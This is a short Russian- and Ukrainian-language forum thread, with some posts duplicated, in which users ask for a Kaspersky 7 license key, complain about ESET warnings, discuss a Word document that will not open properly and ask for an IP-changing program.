Дайте ключик для касперского 7 а то истек поставил себе ESET Smart Security. Так он когда чтото находит пишет "возможно троянская программа" мне эт надоело решил проверить онлайн сканером касперским вирусов в файле ненашло.
Вообщем ESET Smart Security атстойный антивирус. дайте ключик для касперчега)
Дайте ключик для касперского 7 а то истек поставил себе ESET Smart Security. Так он когда чтото находит пишет "возможно троянская программа" мне эт надоело решил проверить онлайн сканером касперским вирусов в файле ненашло.
Вообщем ESET Smart Security атстойный антивирус. дайте ключик для касперчега)
:uups:Сам ты атстойный...нужна уметь пользовацца !
В когось була така штука?
Відкриваю файл (doc) в ворді...а воно таку тему видає:)
Шо робити:confused::|
В когось була така штука?
Відкриваю файл (doc) в ворді...а воно таку тему видає:)
Шо робити:confused::|
Спробуй відкрити старішою версією ворда(на скільки я бачу, то то 2007 версія)!
Спробуй відкрити старішою версією ворда(на скільки я бачу, то то 2007 версія)!
різниці нема....БЛІНЬ...
Підкажіть будьласка прогу, яка змінює айпі ПК.:)
v3.8.3, Copyright ©2000-2010